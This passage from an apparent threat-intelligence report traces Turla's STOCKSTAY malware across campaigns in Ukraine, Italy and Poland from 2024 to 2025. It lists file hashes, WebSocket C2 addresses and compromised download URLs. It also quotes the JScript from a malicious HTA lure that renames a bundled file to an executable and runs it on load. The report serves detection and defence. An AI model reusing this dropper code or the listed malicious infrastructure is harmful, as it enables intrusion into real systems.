<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div><table><colgroup><col><col><col></colgroup>
<tbody>
<tr>
<td>
<p><strong>Filename</strong></p>
</td>
<td>
<p><strong>Description</strong></p>
</td>
<td>
<p><strong>SHA-256</strong></p>
</td>
</tr>
<tr>
<td>
<p><code>apps_libwallets_v1.3.rar</code></p>
</td>
<td>
<p><span>RAR archive containing STOCKSTAY components</span></p>
</td>
<td>
<p><code>81aabf646619ea5f4a72457cd3aa17c5988003d67e6454f45e7cb33613021bac</code></p>
</td>
</tr>
<tr>
<td>
<p><code>StockMarketView.exe</code></p>
</td>
<td>
<p><span>STOCKSTAY.STOCKMARKET orchestrator</span></p>
</td>
<td>
<p><code>9164054d0bf0b7c8820da4f742860940998984555e65820e4fa8dd07b6bd67ec</code></p>
</td>
</tr>
<tr>
<td>
<p><code>StockMarketNet.exe</code></p>
</td>
<td>
<p><span>STOCKSTAY.STOCKBROKER tunneler</span></p>
</td>
<td>
<p><code>34fcbe7e90fc87a4f3766469c19a64f24672d7adb99e0198f5ba10d58911368b</code></p>
</td>
</tr>
<tr>
<td>
<p><code>StockMarketSystem.exe</code></p>
</td>
<td>
<p><span>STOCKSTAY.STOCKTRADER backdoor</span></p>
</td>
<td>
<p><code>0a545dd1b703cddfb3d582c8c70f65f556bbd580bfa836a387121eb837bda61b</code></p>
</td>
</tr>
<tr>
<td>
<p><code>default.conf</code></p>
</td>
<td>
<p><span>STOCKSTAY configuration file</span></p>
</td>
<td>
<p><code>2623c6e3c1f5a7b5e735a64813bc0e1382ae45831f5fadffb08c0e7b096627f7</code></p>
</td>
</tr>
</tbody>
</table></div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
<p><span><span>Table 8: File indicators</span></span></p>
</div></div>
<div class="block-paragraph_advanced"><h4><span>January 2024: Ukraine</span></h4>
<p><span>GTIG conducted a review of an incident response conducted by Mandiant relating to a late-2023 compromise of a Ukrainian organization, in which we observed Turla deploying a wide range of tools into the victim’s network, including WILDDAY, DIAMONDBACK and KAZUAR, via malicious GPO installation from a compromised domain controller. This activity was accompanied by other simple scripts and backdoors to deploy malware across multiple machines in the infected organization. </span></p>
<p><span>During the review, GTIG identified evidence of STOCKSTAY execution on one of the hosts impacted by the infected domain controller. Multiple ZIP archives, each containing one of the core components of STOCKSTAY or its configuration, were uploaded to the domain controller. The files were found in a directory used for staging registry files used to install WILDDAY both prior to and after STOCKSTAY appeared on the host, as well as for staging output from an otherwise unknown Powershell backdoor (iclsClient.ps1) which was also observed running from the domain controller.</span></p>
<p><span>During this operation, an initial STOCKSTAY configuration file was deployed to the domain controller alongside the STOCKSTAY core component executables, however this file was not able to be decrypted using any known passwords or environmental identifiers. A short while later, Mandiant observed a second configuration file being deployed to the domain controller, this time encrypted using the domain name associated with the compromised network. GTIG assesses with moderate confidence that the deployment of the initial configuration file was either a mistake by the threat actor - perhaps deploying a configuration file associated with a different victim - or the result of a default or invalid configuration file being bundled with STOCKSTAY during initial deployment to prevent sensitive C2 details from being captured in the event of early detection of the malware in the victim’s environment.  </span></p>
<p><span>The successfully decrypted configuration defined a STOCKSTAY WebSocket C2 URL of </span><code>wss://wool-basalt-clock.glitch.me/ws</code><span>. Additionally, the configuration specified an operational time-frame of Monday to Friday between the hours of 0900 and 1800 on the victim's system. This time-based restriction is likely intended to blend C2 communications with normal business operations in the victim's network. This same time-frame has been observed in a majority of STOCKSTAY configuration files analyzed by GTIG.</span></p>
<p><span>Of particular note, toward the end of this operation, Mandiant identified firewall detections relating to one of KAZUAR’s C2 endpoints. GTIG assesses, with low to moderate confidence, that the threat actor could have been aware of the suspicion surrounding its C2 and deployed STOCKSTAY as a failsafe in case KAZUAR was identified and remediated, thus enabling reinfection at a later date, in the event that STOCKSTAY remained undetected.</span></p></div>
<div class="block-paragraph_advanced"><div align="left">
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div><table border="1px" cellpadding="16px"><colgroup><col><col></colgroup>
<tbody>
<tr>
<td>
<p><strong>Indicator</strong></p>
</td>
<td>
<p><strong>Description</strong></p>
</td>
</tr>
<tr>
<td>
<p><code>wss://wool-basalt-clock.glitch.me/ws</code></p>
</td>
<td>
<p><span>STOCKSTAY WebSocket C2</span></p>
</td>
</tr>
</tbody>
</table></div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
<p><span><span>Table 9: Network indicators</span></span></p>
</div></div>
<div class="block-paragraph_advanced"><h4><span>February 2024: Italy</span></h4>
<p><span>An MSI file configured to install STOCKSTAY was uploaded to VirusTotal at 2024-02-20 11:45:26 from Italy, under the filename “Copia.msi”. The MSI masqueraded as the </span><span>ILSpy application developed by ICSharpCodeTeam, and contained a large number of legitimate benign components. The MSI installed the core STOCKSTAY components under </span><code>%LOCALAPPDATA%/Programs/SMN/</code><span>, and enabled persistent execution via registry run keys. </span></p>
<p><span>The STOCKSTAY samples contained in the MSI were compiled between January 29 and January 31, 2024, with the configuration file last being modified on February 13, 2024, just a week before being submitted to VirusTotal.</span></p>
<p><span>In addition to the installation of STOCKSTAY, the MSI file contains a custom MSI action named “OpenUrl”. This action has the sequence number 1 in the InstallUISequence table, indicating it should be executed before any other actions. The custom action is configured to execute the following command:</span></p></div>
<div class="block-paragraph_advanced"><pre class="language-plain"><code>viewer.exe
https://circoloesteri.elezioni.idnet.it/admin-election/riepilogo.php</code></pre></div>
<div class="block-paragraph_advanced"><p><span>When viewed, the URL contains references to elections (“elezioni”) and the Italian organization “Circolo Degli Esteri”, which according to their official website (</span><a href="https://www.circoloesteri.it/" rel="noopener" target="_blank"><span>https://www.circoloesteri.it/</span></a><span>), was founded to “represent the Ministry of Foreign Affairs”. We do not currently assess that the actor was directly targeting Italian elections, and was instead using elections-related phishing lures to target victims. Due to limited visibility, we have been unable to identify any earlier stages of this particular operation, and cannot confirm the identity of the intended targets of any potential related phishing campaigns.</span></p></div>
<div class="block-paragraph_advanced"><pre class="language-plain"><code>Foreign Affairs Club 1936

Approval of the 2023 Financial Statement

Analysis of the status of those registered to vote (automatically updates every 60 seconds)...
update 6:26:50

Total Voters: 915
Currently registered members with 2-tonte status: 364
Currently registered with status 4 Ready to vote: 5
Currently registered with status 3 - Voted 46
Voter turnout (votes cast on registered voters): 5.03%</code></pre></div>
<div class="block-image_full_width">






  
    <div class="article-module h-c-page">
      <div class="h-c-grid">
  

    <figure class="article-image--large
      
      
        h-c-grid__col
        h-c-grid__col--6 h-c-grid__col--offset-3
        
        
      ">

      
      
        
        <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/stockstay-fig7.max-1000x1000.png" alt="Italian-language decoy claiming to relate to Italy’s Circolo Degli Esteri">
        
        
      
        <figcaption class="article-image__caption "><p data-block-key="ugoq7">Figure 7: Italian-language decoy claiming to relate to Italy’s Circolo Degli Esteri</p></figcaption>
      
    </figure>

  
      </div>
    </div>
  




</div>
<div class="block-paragraph_advanced"><p><span>Although inconclusive, this appears to indicate an intention to deploy STOCKSTAY against Italian-speaking individuals or organizations, specifically with a focus on foreign affairs.</span></p>
<p><span>In following with previous STOCKSTAY instances, this sample utilized environmental keying for its configuration file. GTIG was able to recover the domain name used to decrypt the configuration file in order to identify the WebSocket C2 address </span><code>wss://wool-basalt-clock.glitch.me/ws</code><span>. This matches the C2 address used in January 2024.</span></p></div>
<div class="block-paragraph_advanced"><div align="left">
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div><table><colgroup><col><col><col></colgroup>
<tbody>
<tr>
<td>
<p><strong>Filename</strong></p>
</td>
<td>
<p><strong>Description</strong></p>
</td>
<td>
<p><strong>SHA-256</strong></p>
</td>
</tr>
<tr>
<td>
<p><code>Copia.msi</code></p>
</td>
<td>
<p><span>MSI containing STOCKSTAY components</span></p>
</td>
<td>
<p><code>b064a3efb04ed77e6c57955089ce639e193d166c8ea2216c98c3e9b701ea2cff</code></p>
</td>
</tr>
<tr>
<td>
<p><code>StockMarketView.exe</code></p>
</td>
<td>
<p><span>STOCKSTAY.STOCKMARKET orchestrator</span></p>
</td>
<td>
<p><code>82707cfdf24dcb762f4615f01e1ba4d3dfdec4abe9cd588558d2634d7e6a5eeb</code></p>
</td>
</tr>
<tr>
<td>
<p><code>StockMarketNet.exe</code></p>
</td>
<td>
<p><span>STOCKSTAY.STOCKBROKER tunneler</span></p>
</td>
<td>
<p><code>249a4c7cacdd8e99a2a089a5c0ce904f2eff22e0e40fcfb10f7824dca6c51ecb</code></p>
</td>
</tr>
<tr>
<td>
<p><code>StockMarketSystem.exe</code></p>
</td>
<td>
<p><span>STOCKSTAY.STOCKTRADER backdoor</span></p>
</td>
<td>
<p><code>b728eba4f0d6d16602fbad05a591f14391594262d3584b2e249e97f86e4dcc5a</code></p>
</td>
</tr>
<tr>
<td>
<p><code>default.conf</code></p>
</td>
<td>
<p><span>STOCKSTAY configuration file</span></p>
</td>
<td>
<p><code>40b1208dda0cd5dd95c6b57764b2cfe7145b3ed9457f498408b4aaa05bf3ef50</code></p>
</td>
</tr>
</tbody>
</table></div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
<p><span><span>Table 10: File indicators</span></span></p>
</div></div>
<div class="block-paragraph_advanced"><div align="left">
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div><table><colgroup><col><col></colgroup>
<tbody>
<tr>
<td>
<p><strong>Indicator</strong></p>
</td>
<td>
<p><strong>Description</strong></p>
</td>
</tr>
<tr>
<td>
<p><code>https://circoloesteri.elezioni.idnet.it/admin-election/riepilogo.php</code></p>
</td>
<td>
<p><span>Italian language lure relating to voting on matters related to the Italian Ministry of Foreign Affairs.</span></p>
</td>
</tr>
<tr>
<td>
<p><code>wss://wool-basalt-clock.glitch.me/ws</code></p>
</td>
<td>
<p><span>STOCKSTAY WebSocket C2</span></p>
</td>
</tr>
</tbody>
</table></div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
<p><span><span>Table 11: Network indicators</span></span></p>
</div></div>
<div class="block-paragraph_advanced"><h4><span>March 18 – April 3, 2025: Ukraine</span></h4>
<p><span>On April 2, 2025, GTIG identified a compromised email account sending a phishing email containing a message purporting to originate from a Ukrainian university, relating to the testing of a new distance learning environment. The threat actor attached a malicious Remote Desktop Protocol (RDP) file to the email, which upon opening resulted in a connection being established between the victim and an open RDP port (3389) hosted on the actor-registered domain chosen to imitate the same academic institution. </span></p>
<p><span>Once the victim connected to the actor's infrastructure, GTIG observed the actor deploying STOCKSTAY.MARKETMAKER to the client. STOCKSTAY.MARKETMAKER was configured to download a ZIP containing STOCKSTAY from a legitimate but compromised website belonging to the State Regulatory Service of Ukraine. In contrast to the majority of earlier observations, the configuration file observed during this operation was protected with a hard-coded password. This appears to correspond with this particular operation’s focus on initial access to a victim’s environment via spear-phishing, through which the specific domain or host name may not be known to the threat actor, and thus cannot be used for environmental keying. GTIG was able to identify the malware using the WebSocket C2 URL </span><code>wss://weatherdataai.theworkpc.com/ws</code><span>.</span></p>
<p><span>According to the metadata associated with the ZIP archive downloaded by STOCKSTAY.MARKETMAKER, the core STOCKSTAY components used during this operation were last modified between March 18 – 26, with the configuration file last being modified on March <span>31</span>.</span></p></div>
<div class="block-paragraph_advanced"><div align="left">
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div><table><colgroup><col><col><col></colgroup>
<tbody>
<tr>
<td>
<p><strong>Filename</strong></p>
</td>
<td>
<p><strong>Description</strong></p>
</td>
<td>
<p><strong>SHA-256</strong></p>
</td>
</tr>
<tr>
<td>
<p><code>MicrosoftUpdateOneDrive.exe</code></p>
</td>
<td>
<p><span>STOCKSTAY.MARKETMAKER Downloader</span></p>
</td>
<td>
<p><code>da8a96bc74e265f945f1cc6992c6dc0f9ea36ed1991f7b8d312db79d9bf78c40</code></p>
</td>
</tr>
<tr>
<td>
<p><code>docs.zip</code></p>
</td>
<td>
<p><span>ZIP archive containing STOCKSTAY components</span></p>
</td>
<td>
<p><code>9fe944147c15a87963b06baf6473288d64c23655a0ba9369c35566272d8efc73</code></p>
</td>
</tr>
<tr>
<td>
<p><code>SMEditor.exe</code></p>
</td>
<td>
<p><span>STOCKSTAY.STOCKTRADER backdoor</span></p>
</td>
<td>
<p><code>e1d16fb635060d23e889b0617d77f0cf06d00cc19b43a2c8b5ac53ac027ac722</code></p>
</td>
</tr>
<tr>
<td>
<p><code>SMNet.exe</code></p>
</td>
<td>
<p><span>STOCKSTAY.STOCKBROKER tunneler</span></p>
</td>
<td>
<p><code>dfd5cb91d06b9649d4cab500343af80ad1144a9e46641cc406f43dd169003c22</code></p>
</td>
</tr>
<tr>
<td>
<p><code>StockMarketView.exe</code></p>
</td>
<td>
<p><span>STOCKSTAY.STOCKMARKET orchestrator</span></p>
</td>
<td>
<p><code>2af7b513c05e76d7da5f75bb0a223c894a706c99ef2c2ddfe4eae542f95a08e0</code></p>
</td>
</tr>
<tr>
<td>
<p><code>fonts</code></p>
</td>
<td>
<p><span>STOCKSTAY configuration file</span></p>
</td>
<td>
<p><code>40a3b969d81ef1ef35dd9ebcc6774e060b1b8949d3d74f38ca6b7d789c95cdb3</code></p>
</td>
</tr>
</tbody>
</table></div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
<p><span><span>Table 12: File indicators</span></span></p>
</div></div>
<div class="block-paragraph_advanced"><div align="left">
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div><table><colgroup><col><col></colgroup>
<tbody>
<tr>
<td>
<p><strong>Indicator</strong></p>
</td>
<td>
<p><strong>Description</strong></p>
</td>
</tr>
<tr>
<td>
<p><code>https://www.drs.gov.ua/wp-content/themes/twentytwentyfive/docs.zip</code></p>
</td>
<td>
<p><span>Compromised State Regulatory Service of Ukraine infrastructure serving ZIP archive containing STOCKSTAY components</span></p>
</td>
</tr>
<tr>
<td>
<p><code>wss://weatherdataai.theworkpc.com/ws</code></p>
</td>
<td>
<p><span>STOCKSTAY WebSocket C2</span></p>
</td>
</tr>
</tbody>
</table></div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
<p><span><span>Table 13: Network indicators</span></span></p>
</div></div>
<div class="block-paragraph_advanced"><h4><span>May 14, 2025: Poland</span></h4>
<p><span>GTIG identified two samples of STOCKSTAY.STOCKBROKER being uploaded to VirusTotal on May </span>14, 2025 from Poland. </p>
<p><span>The first sample, named “ClientMNGR2.exe”, matched previously observed versions, however the second sample, named “GR3.exe”, was heavily obfuscated using large quantities of junk code, and a previously unknown string obfuscation mechanism. GTIG tracks this obfuscation mechanism as K1MORPHER, and we have since observed its inclusion in all core STOCKSTAY components, and within select samples of KAZUAR; increasing our confidence that STOCKSTAY exists within the same development ecosystem as other malware leveraged by Turla.</span></p></div>
<div class="block-paragraph_advanced"><div align="left">
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div><table><colgroup><col><col><col></colgroup>
<tbody>
<tr>
<td>
<p><strong>Filename</strong></p>
</td>
<td>
<p><strong>Description</strong></p>
</td>
<td>
<p><strong>SHA-256</strong></p>
</td>
</tr>
<tr>
<td>
<p><code>ClientMNGR2.exe</code></p>
</td>
<td>
<p><span>STOCKSTAY.STOCKBROKER tunneler obfuscated with K1MORPHER</span></p>
</td>
<td>
<p><code>d3fd32f915c239872c9e7ed9408b1f36dfcef03aa68f9a396d05c437667cdb43</code></p>
</td>
</tr>
<tr>
<td>
<p><code>GR3.exe</code></p>
</td>
<td>
<p><span>STOCKSTAY.STOCKBROKER tunneler obfuscated with K1MORPHER</span></p>
</td>
<td>
<p><code>98ce3c6e4dd05887ea619f2bbfeb2e2c2805ed07e85e119b79b828b7ef8be397</code></p>
</td>
</tr>
</tbody>
</table></div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
<p><span><span>Table 14: File indicators</span></span></p>
</div></div>
<div class="block-paragraph_advanced"><h4><span>May 28 – August 8, 2025: Ukraine </span><span>— </span><span>Deployment via Malicious HTA</span></h4>
<p><span>On August 8, 2025, GTIG identified a RAR archive, “calculator.rar”, being submitted to VirusTotal. The archive had been hosted on compromised infrastructure belonging to a Ukrainian IT company since at least July 22, 2025. The archive contained a malicious HTA file named “Калькулятор грошового забезпечення військовослужбовців 2025.hta” (translation: "Military personnel cash benefit calculator 2025.hta"). The HTA was designed to execute a variant of the STOCKSTAY.MARKETMAKER downloader, which was also included in the archive, using the code shown in Figure 9.</span></p></div>
<div class="block-image_full_width">






  
    <div class="article-module h-c-page">
      <div class="h-c-grid">
  

    <figure class="article-image--large
      
      
        h-c-grid__col
        h-c-grid__col--6 h-c-grid__col--offset-3
        
        
      ">

      
      
        
        <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/stockstay-fig8.max-1000x1000.png" alt="Lure HTML page displayed by Калькулятор грошового забезпечення військовослужбовців 2025.hta">
        
        
      
        <figcaption class="article-image__caption "><p data-block-key="j8j2f">Figure 8: Lure HTML page displayed by Калькулятор грошового забезпечення військовослужбовців 2025.hta</p></figcaption>
      
    </figure>

  
      </div>
    </div>
  




</div>
<div class="block-paragraph_advanced"><pre class="language-plain"><code>&lt;script language="JScript"&gt;
  function renameAndRunFile() {
    try {
      var oldName = "calculator_2025_files\\styles.dat";
      var newName = "calculator_2025_files\\styles.dat.exe";

      var fso = new ActiveXObject("Scripting.FileSystemObject");

      if (fso.FileExists(oldName)) {
        if (fso.FileExists(newName)) {
          fso.DeleteFile(newName);
        }
        fso.MoveFile(oldName, newName);

        var shell = new ActiveXObject("WScript.Shell");
        shell.Run('"' + newName + '"', 1, false);
      } else {
      }

    } catch (e) {
    }
  }

window.onload = function() {
  renameAndRunFile();
};
&lt;/script&gt;</code></pre>
<p><span><span>Figure 9: JavaScript code contained in Калькулятор грошового забезпечення військовослужбовців 2025.hta</span></span></p></div>
<div class="block-paragraph_advanced"><p><span>The STOCKSTAY.MARKETMAKER variant retrieved a ZIP archive, “EditorToolsPdf.zip”, containing the core STOCKSTAY components from a second compromised server located in Ukraine, this time hosting the archive within a compromised WordPress instance. </span></p>
<p><span>Analysis of the modification timestamps within the military calculator lure archive show that this operation dated as far back as May <span>28,</span> 2025, when the majority of the contents of the “calculator_2025_files” folder were last modified. The STOCKSTAY.MARKETMAKER executable was last modified on June 5, 2025, and the malicious HTA file was modified on June 10, 2025. </span></p>
<p><span>Similar examination of the STOCKSTAY archive shows the configuration file being modified on June 4, 2025, while the archive itself was last modified on the compromised server on June 5, 2025. This series of events shows that the complete STOCKSTAY ZIP archive was staged on the compromised infrastructure while modifications were being made to the initial phishing lures.</span></p>
<p><span>GTIG has been able to confirm via a trusted third party that the original compromise of the Ukrainian server used to host the STOCKSTAY archive occurred on or before May <span>13,</span> 2025.</span></p></div>
<div class="block-paragraph_advanced"><div align="left">
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div><table><colgroup><col><col><col></colgroup>
<tbody>
<tr>
<td>
<p><strong>Filename</strong></p>
</td>
<td>
<p><strong>Description</strong></p>
</td>
<td>
<p><strong>SHA-256</strong></p>
</td>
</tr>
<tr>
<td>
<p><code>calculator.rar</code></p>
</td>
<td>
<p><span>RAR archive containing STOCKSTAY components</span></p>
</td>
<td>
<p><code>6da0b4c1a5d0d3fb6e6a2990a82ba51db1f68a3bba818baa46526a29731e2342</code></p>
</td>
</tr>
<tr>
<td>
<p><code>Калькулятор грошового забезпечення військовослужбовців 2025.hta</code></p>
</td>
<td>
<p><span>HTA lure </span></p>
<p><span>(translated filename: “Military personnel cash benefit calculator 2025.hta”)</span></p>
</td>
<td>
<p><code>0d6b083208097d5b3e189891338540f6c64faaaaf268b0bb0b085dd53d5857b4</code></p>
</td>
</tr>
<tr>
<td>
<p><code>styles.dat.exe</code></p>
</td>
<td>
<p><span>STOCKSTAY.MARKETMAKER downloader</span></p>
</td>
<td>
<p><code>626330d22f77d9cbca9d40cc06568041703f194610c4c5a84bbb05a2e4ee7459</code></p>
</td>
</tr>
<tr>
<td>
<p><code>EditorToolsPdf.zip</code></p>
</td>
<td>
<p><span>ZIP archive containing STOCKSTAY components</span></p>
</td>
<td>
<p><code>447f430b46fad5a3f8e8c5aad1f8f7f79af069489c3d9c29224bb9f14f0c7bf4</code></p>
</td>
</tr>
<tr>
<td>
<p><code>ViewPdf.exe</code></p>
</td>
<td>
<p><span>STOCKSTAY.STOCKMARKET orchestrator</span></p>
</td>
<td>
<p><code>45bb8d1ab2c13bf4354294e13d3c9be15de625d807301905b98462f43f93e893</code></p>
</td>
</tr>
<tr>
<td>
<p><code>ClientMNGR.exe</code></p>
</td>
<td>
<p><span>STOCKSTAY.STOCKBROKER tunneler</span></p>
</td>
<td>
<p><code>80f6c010fd260d0bcf18a4b6a8d62505adbed50d2e615ed9522c4bfd61c00661</code></p>
</td>
</tr>
<tr>
<td>
<p><code>ConverterDDSNet.exe</code></p>
</td>
<td>
<p><span>STOCKSTAY.STOCKTRADER backdoor</span></p>
</td>
<td>
<p><code>55249f296b63a8bcf911b8bc96de43c1ac2b4a56c150a19d33d892a47e57352c</code></p>
</td>
</tr>
<tr>
<td>
<p><code>fonts</code></p>
</td>
<td>
<p><span>STOCKSTAY configuration file</span></p>
</td>
<td>
<p><code>e3364ee21cae6725451e8bc9ab9933df0000fd19814170bd132da68d1906d5ff</code></p>
</td>
</tr>
</tbody>
</table></div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
<p><span><span>Table 15: File indicators</span></span></p>
</div></div>
<div class="block-paragraph_advanced"><div align="left">
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div><table><colgroup><col><col></colgroup>
<tbody>
<tr>
<td>
<p><strong>Indicator</strong></p>
</td>
<td>
<p><strong>Description</strong></p>
</td>
</tr>
<tr>
<td>
<p><code>https://basecon.com.ua/calculator.rar</code></p>
</td>
<td>
<p><span>RAR archive containing HTA lure and STOCKSTAY.MARKETMAKER downloader</span></p>
</td>
</tr>
<tr>
<td>
<p><code>https://online.zp.ua/wp-content/uploads/Tools/EditorToolsPdf.zip</code></p>
</td>
<td>
<p><span>Compromised WordPress infrastructure hosting STOCKSTAY ZIP archive</span></p>
</td>
</tr>
<tr>
<td>
<p><code>wss://canal1zac1a.onrender.com/ws</code></p>
</td>
<td>
<p><span>STOCKSTAY WebSocket C2</span></p>
</td>
</tr>
</tbody>
</table></div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
<p><span><span>Table 16: Network indicators</span></span></p>
</div></div>
<div class="block-paragraph_advanced"><h4><span>July 23 – 28, 2025: Actor Uses GitHub to Host STOCKSTAY MSI Files</span></h4>
<p><span>GTIG identified a GitHub account we suspect of being used by the threat actor to test or deploy STOCKSTAY. The GitHub account, </span><code>Roberto1983-ai</code><span>, was created on July <span>23,</span> 2025 at 12:01:03. </span></p>
<p><span>On July <span>24,</span> 2025, the account created a public repository named </span><code>msi_installer_test2</code><span>, into which a single file was uploaded: </span><code>DiplomacyEduAI.msi</code><span>. A second repository, this time named </span><code>msi_installer_test3</code><span>, was created by the same user on July 28, 2025, and subsequently populated with another version of </span><code>DiplomacyEduAI.msi</code><span>.</span></p>
<p><span>Both versions of </span><code>DiplomacyEduAI.msi</code><span> contained core STOCKSTAY components, alongside a configuration file containing the WebSocket C2 URL </span><code>wss://canal1zac1a.onrender.com/ws</code><span>. GTIG has been unable to identify any active operations using these specific MSI files.</span></p></div>
<div class="block-paragraph_advanced"><div align="left">
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div><table><colgroup><col><col><col></colgroup>
<tbody>
<tr>
<td>
<p><strong>Filename</strong></p>
</td>
<td>
<p><strong>Description</strong></p>
</td>
<td>
<p><strong>SHA-256</strong></p>
</td>
</tr>
<tr>
<td>
<p><code>DiplomacyEduAI.msi</code></p>
</td>
<td>
<p><span>MSI containing STOCKSTAY components</span></p>
</td>
<td>
<p><code>19e6ed42248f9d03beb343a7c09a864dcd3cd671c29e1e5eac93579225224ac9</code></p>
</td>
</tr>
<tr>
<td>
<p><code>DiplomacyEduAI.msi</code></p>
</td>
<td>
<p><span>MSI containing STOCKSTAY components</span></p>
</td>
<td>
<p><code>6298f3150ad94a242e649886d47c59c634a4d04b9af5ee15e3bf335c40b5e58e</code></p>
</td>
</tr>
<tr>
<td>
<p><code>ClientMNGR.exe</code></p>
</td>
<td>
<p><span>STOCKSTAY.STOCKBROKER tunneler</span></p>
</td>
<td>
<p><code>80f6c010fd260d0bcf18a4b6a8d62505adbed50d2e615ed9522c4bfd61c00661</code></p>
</td>
</tr>
<tr>
<td>
<p><code>ViewPdf.exe</code></p>
</td>
<td>
<p><span>STOCKSTAY.STOCKMARKET orchestrator</span></p>
</td>
<td>
<p><code>45bb8d1ab2c13bf4354294e13d3c9be15de625d807301905b98462f43f93e893</code></p>
</td>
</tr>
<tr>
<td>
<p><code>ConverterDDSNet.exe</code></p>
</td>
<td>
<p><span>STOCKSTAY.STOCKTRADER backdoor</span></p>
</td>
<td>
<p><code>d8fe8f3fe838d5b1a1043096f6f6bb6f524f5f1b0c9f83a081078a824daa0cf3</code></p>
</td>
</tr>
<tr>
<td>
<p><code>fonts</code></p>
</td>
<td>
<p><span>STOCKSTAY configuration file</span></p>
</td>
<td>
<p><code>4e3bed10a8eff3e9205c1f37f647512464271d5ac65df7ae4709735621a38320</code></p>
</td>
</tr>
</tbody>
</table></div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
<p><span><span>Table 17: File indicators</span></span></p>
</div></div>
<div class="block-paragraph_advanced"><div align="left">
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div><table border="1px" cellpadding="16px"><colgroup><col><col></colgroup>
<tbody>
<tr>
<td>
<p><strong>Indicator</strong></p>
</td>
<td>
<p><strong>Description</strong></p>
</td>
</tr>
<tr>
<td>
<p><code>wss://canal1zac1a.onrender.com/ws</code></p>
</td>
<td>
<p><span>STOCKSTAY WebSocket C2</span></p>
</td>
</tr>
</tbody>
</table></div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
<p><span><span>Table 18: Network indicators</span></span></p>
</div></div>
<div class="block-paragraph_advanced"><h4><span>August 14, 2025: Actor Uses GitHub to Host STOCKSTAY Server Code</span></h4>
<p><span>GTIG identified a second GitHub account, which was observed hosting what we assess to be server-side code for handling STOCKSTAY C2 communications. The GitHub account, </span><code>ChikenFresh</code><span>, was created on August 14, 2025, then almost immediately created a public repository named </span><code>google-ai-labs-it</code><span>, into which the suspected C2 controller code was uploaded. Our analysis of the C2 controller is included in the malware analysis section earlier in this report.</span></p>
<p><span>The GitHub repository name corresponds with a STOCKSTAY C2 server identified running on the Render platform, however GTIG has not observed any active operations using this infrastructure. We assess that the threat actor linked this GitHub repository to their Render account in order to utilize their </span><a href="https://render.com/docs/websocket" rel="noopener" target="_blank"><span>WebSocket hosting</span></a><span> capabilities.</span></p></div>
<div class="block-paragraph_advanced"><div align="left">
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div><table><colgroup><col><col><col></colgroup>
<tbody>
<tr>
<td>
<p><strong>Filename</strong></p>
</td>
<td>
<p><strong>Description</strong></p>
</td>
<td>
<p><strong>SHA-256</strong></p>
</td>
</tr>
<tr>
<td>
<p><code>server.py</code></p>
</td>
<td>
<p><span>Python STOCKSTAY C2 controller</span></p>
</td>
<td>
<p><code>f04f43b6f7c2d86109c495179b497f7fb45fd95816623de1b77900f71b4f99ed</code></p>
</td>
</tr>
<tr>
<td>
<p><code>models.py</code></p>
</td>
<td>
<p><span>Database table definitions and models for use by </span><code>server.py</code><span> </span></p>
</td>
<td>
<p><code>7615140f78d9a0ce31cc9fe8c54c60028a7439cb32526fd97b10afef7145dd78</code></p>
</td>
</tr>
<tr>
<td>
<p><code>wtools.py</code></p>
</td>
<td>
<p><span>Utility functions for use by </span><code>server.py</code></p>
</td>
<td>
<p><code>b55f3b8a7334af049ba3f70a9ad3fe78574b1e180c68baf9a7110d104387a636</code></p>
</td>
</tr>
</tbody>
</table></div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
<p><span><span>Table 19: File indicators</span></span></p>
</div></div>
<div class="block-paragraph_advanced"><div align="left">
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
